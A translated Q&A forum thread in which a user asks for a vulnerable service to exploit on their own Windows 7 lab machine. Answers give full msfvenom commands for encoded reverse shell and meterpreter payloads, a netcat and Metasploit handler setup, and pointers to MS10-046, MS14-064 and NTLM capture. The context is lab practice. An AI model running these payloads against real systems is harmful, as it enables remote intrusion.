安装Windows 7易受攻击的服务

Question

我有一个项目或演示，我必须利用Windows 7来获得远程shell。

我在我的Windows 7机器上用nessus做了一次漏洞扫描，但是我没有发现任何能让我达到目标的漏洞。

因此，是否有任何包含缓冲区流的易受攻击的服务，我可以安装在我的Windows 7机器上，并使用它来利用metasploit远程攻击该机器。

更多信息：

• 我试图利用的机器是我的，所以一切都是合法的。
• 我正在使用Ubuntu15.10和metasploit的最新版本(我从kali存储库安装它)。

Answer 1

我使用了这个ftp 脆弱性 (@halfinformed给我的评论)。

下面是使用简单的反向外壳安装和利用的步骤：

1. 从上面提供的链接安装易受攻击的服务。
2. 使用此命令msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=your_ip_address LPORT=4444 -e x86/shikata_ga_nai -b "\x00\x0d\x0a\x3d\x5c\x2f" -i 3 -f python生成一个新的有效负载，以满足您的需要(取决于您的IP地址)。
3. 用前面的命令生成的有效载荷(从第23行到第55行)替换利用脚本中的有效负载。
4. 在利用脚本中替换受害者的IP地址(第61行)。
5. 使用命令nc -nlpv 4444侦听另一个终端上的netcat。
6. 使用python path_to_exlpoit_script.py启动利用脚本。
7. 到你启动nc的终端，你会发现一个反向外壳在等着你。

如果您不想利用米计器的有效载荷，则需要更改步骤2和步骤5：

1. 使用此命令msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=your_ip_address LPORT=4444 -e x86/shikata_ga_nai -b "\x00\x0d\x0a\x3d\x5c\x2f" -i 3 -f python生成适合您需要的计量器有效负载。
2. 在另一个终端用计量器听。为此，打开metasploit并键入use exploit/multi/handler；然后是set payload windows/meterpreter/reverse_tcp；然后是set lhost your_ip_address；然后是set lport 4444；最后是exploit。

Answer 2

假设Windows 7机器不需要完全修补/更新--您可以查看运行禁用用户帐户控制(UAC)的普通Windows 7(未应用更新)副本，并利用MS10-046进行攻击。

MS10-046是一个关键漏洞，可能使潜在攻击者获得与本地用户相同的用户权限(大多数普通用户使用具有管理员权限的帐户)。此漏洞影响Windows 7的32位版本和64位版本.

该漏洞涉及.LNK文件的处理，该文件具有指向恶意动态链接库(DLL)文件的图标资源。

在不明确知道是否需要缓冲区溢出漏洞的情况下--我想说，这应该会奏效，或者类似地，您可以使用像Metasploitable这样的发行版，因为它是故意使易受攻击的。

Answer 3

Windows 7到8甚至可能有10种可用的漏洞(如MS14-064)。

你可以在这里搜索：http://www.intelligentexploit.com/search-results.html?search=Microsoft+Windows

否则，您可能希望以计算机上已安装的程序为目标。请参阅http://www.exploit-db.com

否则，您可以通过欺骗受害者访问目标服务器来尝试著名的SMB/NTLM捕获。

PS:我不能在这里添加两个以上的链接，但是可以随意使用DM me @haxorhead。